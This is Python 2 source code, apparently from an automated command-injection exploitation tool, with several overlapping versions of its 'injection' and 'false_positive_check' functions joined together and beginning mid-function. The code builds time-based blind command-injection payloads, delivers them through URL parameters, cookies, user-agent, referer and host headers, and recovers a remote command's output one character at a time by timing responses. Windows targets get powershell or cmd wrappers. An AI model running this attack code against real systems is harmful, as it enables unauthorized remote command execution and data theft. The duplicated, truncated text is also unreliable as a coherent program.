print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters."+ Style.RESET_ALL found_chars = True break if found_chars == True : num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 sys.stdout.write("\r(*) Grabbing the output, please wait... [ "+str(percent)+"% ]") sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(32, 129): if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: if not menu.options.verbose: output.append(chr(ascii_char)) percent = ((num_of_chars*100)/output_length) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(output_length*1.0)),2)) sys.stdout.write("\r(*) Grabbing the output, please wait... [ "+str(float_percent)+"% ]") sys.stdout.flush() else: output.append(chr(ascii_char)) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) # Check for empty output. if output == (len(output) * " "): output = "" else: check_start = 0 if not menu.options.verbose: sys.stdout.write("["+Fore.RED+" FAILED "+ Style.RESET_ALL+"]\n") sys.stdout.flush() else: print "" check_how_long = 0 output = False return check_how_long, output
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response): found_chars = False if menu.options.verbose: info_msg = "Testing the reliability of used payload... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() for output_length in range(1, 3): # Execute shell commands on vulnerable host. if alter_shell: payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method) else: payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response) if (how_long >= settings.FOUND_HOW_LONG) and (how_long - delay >= settings.FOUND_DIFF): found_chars = True break if found_chars == True : num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(1, 3): if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response) if (how_long >= settings.FOUND_HOW_LONG) and (how_long - delay >= settings.FOUND_DIFF): output.append(ascii_char) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) if str(output) == str(randvcalc): return how_long, output
def false_positive_check(separator, TAG, cmd, whitespace, prefix, suffix, timesec, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response): if settings.TARGET_OS == "win": previous_cmd = cmd if alter_shell: cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\"" else: cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length" found_chars = False info_msg = "Checking the reliability of the used payload " info_msg += "in case of a false positive result... " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: print settings.print_info_msg(info_msg) # Varying the sleep time. timesec = timesec + random.randint(1, 5) # Checking the output length of the used payload. for output_length in range(1, 3): # Execute shell commands on vulnerable host. if alter_shell: payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method) else: payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for testing the reliability of used payload..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write(settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) if (how_long >= settings.FOUND_HOW_LONG) and (how_long - timesec >= settings.FOUND_DIFF): found_chars = True break if found_chars == True : if settings.TARGET_OS == "win": cmd = previous_cmd num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 sys.stdout.flush() is_valid = False for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(1, 20): if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for testing the reliability of used payload..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write(settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) if (how_long >= settings.FOUND_HOW_LONG) and (how_long - timesec >= settings.FOUND_DIFF): output.append(ascii_char) is_valid = True break if is_valid: break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) if str(output) == str(randvcalc): if settings.VERBOSITY_LEVEL == 1: print "" return how_long, output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response): if settings.TARGET_OS == "win": previous_cmd = cmd if alter_shell: cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\"" else: cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length" if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False info_msg = "Retrieving the length of execution output... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL > 1: print "" for output_length in range(int(minlen), int(maxlen)): if alter_shell: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method) else: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write(settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) # Examine time-responses injection_check = False if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if output_length > 1: if settings.VERBOSITY_LEVEL >= 1: pass else: sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL+ "]\n") sys.stdout.flush() if settings.VERBOSITY_LEVEL == 1: print "" info_msg = "Retrieved: " + str(output_length) print settings.print_info_msg(info_msg) found_chars = True injection_check = False break # Proceed with the next (injection) step! if found_chars == True : if settings.TARGET_OS == "win": cmd = previous_cmd num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = "0.0" info_msg = "Presuming the execution output, please wait... " if menu.options.verbose < 1 : info_msg += "[ " +str(percent)+ "% ]" elif menu.options.verbose == 1 : info_msg += "" else: info_msg += "\n" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): char_pool = checks.generate_char_pool(num_of_chars) for ascii_char in char_pool: if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write(settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) # Examine time-responses injection_check = False if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if not settings.VERBOSITY_LEVEL >= 1: output.append(chr(ascii_char)) percent = ((num_of_chars*100)/output_length) float_percent = str("{0:.1f}".format(round(((num_of_chars * 100)/(output_length * 1.0)),2))) + "%" if percent == 100: float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL info_msg = "Presuming the execution output, " info_msg += "please wait... [ " + float_percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() else: output.append(chr(ascii_char)) injection_check = False break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) # Check for empty output. if output == (len(output) * " "): output = "" else: check_start = 0 if not settings.VERBOSITY_LEVEL >= 1: sys.stdout.write("[" +Fore.RED+ " FAILED " + Style.RESET_ALL+ "]") sys.stdout.flush() else: print "" check_how_long = 0 output = False if settings.VERBOSITY_LEVEL >= 1 and menu.options.ignore_session: print "" return check_how_long, output
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long): # Log previous 'how_long' for later comparison previous_how_long = how_long found_chars = False if menu.options.verbose: sys.stdout.write("\n(*) Testing the reliability of used payload... ") sys.stdout.flush() for output_length in range(1, 3): if alter_shell: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, delay, http_request_method) else: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if (previous_how_long == how_long) and (how_long >= delay): found_chars = True break if found_chars == True: num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 # Log previous 'how_long' for later comparison previous_how_long = how_long sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(1, 3): if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.fp_result_alter_shell( separator, cmd, num_of_chars, ascii_char, delay, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test( url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if (previous_how_long == how_long) and (how_long >= delay): output.append(ascii_char) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) if str(output) == str(randvcalc): return how_long, output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename): if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False sys.stdout.write("(*) Retrieving the length of execution output... ") sys.stdout.flush() for output_length in range(int(minlen), int(maxlen)): if alter_shell: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, delay, http_request_method) else: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: if output_length > 1: if menu.options.verbose: print "\n" else: sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") sys.stdout.flush() print Style.BRIGHT + "(!) Retrieved " + str( output_length) + " characters." + Style.RESET_ALL found_chars = True break if found_chars == True: num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 sys.stdout.write("\r(*) Grabbing the output, please wait... [ " + str(percent) + "% ]") sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(32, 129): if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.get_char_alter_shell( separator, cmd, num_of_chars, ascii_char, delay, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test( url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: if not menu.options.verbose: output.append(chr(ascii_char)) percent = ((num_of_chars * 100) / output_length) float_percent = "{0:.1f}".format( round( ((num_of_chars * 100) / (output_length * 1.0)), 2)) sys.stdout.write( "\r(*) Grabbing the output, please wait... [ " + str(float_percent) + "% ]") sys.stdout.flush() else: output.append(chr(ascii_char)) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) # Check for empty output. if output == (len(output) * " "): output = "" else: check_start = 0 if not menu.options.verbose: sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n") sys.stdout.flush() else: print "" check_how_long = 0 output = False return check_how_long, output